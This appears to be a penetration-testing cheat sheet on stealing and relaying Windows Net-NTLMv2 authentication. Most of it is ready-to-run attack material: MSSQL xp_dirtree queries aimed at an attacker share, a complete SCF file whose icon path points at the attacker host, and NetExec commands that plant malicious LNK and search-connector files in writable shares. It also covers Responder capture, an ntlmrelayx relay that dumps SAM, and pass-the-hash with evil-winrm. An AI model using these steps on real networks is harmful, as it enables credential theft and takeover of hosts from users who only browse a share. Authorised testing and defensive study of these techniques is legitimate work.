Stealing Hashes
A common technique for compromising accounts is to make a user or a service authenticate to an SMB server we control and capture the resulting Net-NTLMv2 challenge/response (often loosely called the "NTLMv2 hash"; it is not the NT password hash itself). One way to trigger this is a shortcut file whose icon points at our share: when Explorer renders the folder it tries to load the icon, the host authenticates to our server, and the response is logged. The captured response can be cracked offline with hashcat (mode 5600) or, while the authentication is still in flight, relayed to another host to act as that user.
Steal a Hash using MSSQL Database
- Start Responder (or impacket's smbserver) on the attack host, listening on the interface the target can reach:
sudo responder -I tun0
- Then, from an MSSQL session (for example impacket's mssqlclient), run either of the following. Both make SQL Server enumerate a UNC path, so the authentication that arrives is that of the SQL Server service account, not of the login you used:
1> EXEC master..xp_dirtree '\\<TUN0-IP>\share\'
2> GO
# OR
1> EXEC master..xp_subdirs '\\<TUN0-IP>\share\'
2> GO
Steal Hash using SCF File (Scuffy Module)
This method no longer works on Server 2019 and above (Explorer stops fetching the SCF icon from a remote path). On those hosts, use the .lnk technique below instead.
A Shell Command File (SCF) is a small INI-style text file interpreted by Windows Explorer, not a shell script; its classic use is the "Show Desktop" shortcut (Command=ToggleDesktop). The part that matters to us is the IconFile entry: when Explorer lists a folder containing the SCF it resolves the icon path, and if that path is a UNC path to our host the machine authenticates to our SMB server.
- Create a file named, for example:
@Filename.scf
The leading "@" makes the file sort to the top of the directory listing so Explorer renders it (and fetches the icon) as soon as the folder is opened. File content:
[Shell]
Command=2
IconFile=\\<TUN0-IP>\share\iconname.ico
[Taskbar]
Command=ToggleDesktop
- Start Responder on the attack host.
- Wait; the capture arrives as soon as someone browses the share, which on a busy share is usually within a few minutes.
NetExec's scuffy module automates writing the SCF file into writable shares.
Steal Hash using LNK (Slinky Module)
NetExec's slinky module writes a Windows shortcut (.lnk) into every writable share it finds (or only those given in SHARES), with the icon attribute pointing at a server we specify (SMB by default), so that anyone browsing the share triggers an authentication we can capture.
~ ❯ nxc smb -M slinky --options
[*] slinky module options:
# SERVER and NAME are required; the others are optional
SERVER IP of the listening server (running Responder, etc)
NAME LNK file name written to the share(s)
ICO_URI Override full ICO path (e.g. http://192.168.1.2/evil.ico or \\\\192.168.1.2\\testing_path\\icon.ico)
SHARES Specific shares to write to (comma separated, e.g. SHARES=share1,share2,share3)
IGNORE Specific shares to ignore (comma separated, default: C$,ADMIN$,NETLOGON,SYSVOL)
CLEANUP Cleanup (choices: True or False)
Find Share with WRITE Permission
We first need a share on which the user we control has WRITE permission.
In the scenario below we already have a foothold in the internal network and run every command from the attack host through proxychains.
nxc itself lists the shares and the current user's permission on each; look for WRITE in the output:
proxychains4 -q nxc smb 192.168.1.4 -u 'rezydev' -p 'Password123@' --shares
Once we have a writable share we can launch the attack (slinky writes into every writable share unless SHARES= restricts it):
proxychains4 -q nxc smb 192.168.1.4 -u 'rezydev' -p 'Password123@' -M slinky -o SERVER=<tun0-ip> NAME=workfolder
When the command finishes, a malicious workfolder.lnk sits in each writable share. We then start Responder so that its SMB server answers the authentication attempts the shortcut provokes and logs the Net-NTLMv2 responses (Responder also poisons LLMNR/NBT-NS by default, but that is not what this attack relies on). The captured responses can be cracked with hashcat mode 5600.
sudo responder -I tun0
Note: make sure the SMB server is enabled in /etc/responder/Responder.conf, otherwise nothing listens on 445 and no capture is logged.
NTLM Relay Attack
Make sure the LNK is still in the share, otherwise no authentication is triggered and there is nothing to relay.
Instead of capturing and cracking, we can relay the live NTLM authentication to another server on which SMB signing is disabled. Note that relaying needs the in-flight exchange; an already captured Net-NTLMv2 line cannot be relayed.
In an NTLM relay attack the attacker sits between a victim and a target: the victim's NEGOTIATE/AUTHENTICATE messages are forwarded to the target, and the target's challenge is forwarded back, so the target ends up authenticating a session the attacker controls. It works against services that do not require message signing (SMB with signing disabled being the common case), because signing would bind the session key, which the attacker never learns, to the traffic.
# Extract targets with SMB Signing Disabled into a file
proxychains4 -q nxc smb 192.168.1.0/24 --gen-relay-list relay_list.txt
We'll use ntlmrelayx with that relay list. When the relayed account has local admin rights on the target, ntlmrelayx's default SMB action dumps the SAM database, giving us NT hashes to use in a pass-the-hash attack.
Stop Responder before running the following, as both want to bind TCP 445 on the attack host:
# relay_list.txt = 192.168.1.8 (a different host from the one hosting the LNK; relaying back to the origin host is blocked)
sudo proxychains4 -q python3 /opt/impacket/build/scripts-3.12/ntlmrelayx.py -tf relay_list.txt -smb2support --no-http
Wait until the SAM dump completes. If we obtain the local Administrator NT hash we can pass it with evil-winrm:
proxychains4 -q evil-winrm -i 192.168.1.8 -u Administrator -H <HASH>
Cleanup of LNK
proxychains4 -q nxc smb 192.168.1.4 -u 'rezydev' -p 'Password123@' -M slinky -o NAME=workfolder CLEANUP=True
Stealing Hashes using .searchConnector-ms and .library-ms (drop-sc Module)
More info: https://dtm.uk/exploring-search-connectors-and-library-files-on-windows/
.searchConnector-ms and .library-ms files are XML descriptors that Windows Explorer trusts and resolves automatically when the folder containing them is listed. Pointing their location entry at a remote target (a WebDAV URL or a UNC path) makes the host connect out and authenticate to it without the user opening anything, which we can capture or relay.
~ ❯ nxc smb -M drop-sc --options
[*] drop-sc module options:
Technique discovered by @DTMSecurity and @domchell to remotely coerce an host to start WebClient service.
https://dtm.uk/exploring-search-connectors-and-library-files-on-windows/
Module by @zblurx
URL URL in the searchConnector-ms file, default https://rickroll
CLEANUP Cleanup (choices: True or False)
SHARE Specify a share to target
FILENAME Specify the filename used WITHOUT the extension searchConnector-ms (it's automatically added), default is "Documents"
We can now drop the file using the module:
proxychains4 -q nxc smb 192.168.1.4 -u 'rezydev' -p 'Password123@' -M drop-sc -o URL=\\\\TUN0-IP\\heker
With a UNC path as above, the victim authenticates over SMB to our host. When a user lists the shared folder while ntlmrelayx is running on the attack host, we relay that authentication to a target from the relay list (where SMB signing is disabled). An http:// URL instead coerces the WebClient (WebDAV) service, which is the coercion the module's authors describe.
sudo proxychains4 -q python3 /opt/impacket/build/scripts-3.12/ntlmrelayx.py -tf relay_list.txt -smb2support --no-http
Cleanup of drop-sc Module
proxychains4 -q nxc smb 192.168.1.4 -u 'rezydev' -p 'Password123@' -M drop-sc -o CLEANUP=True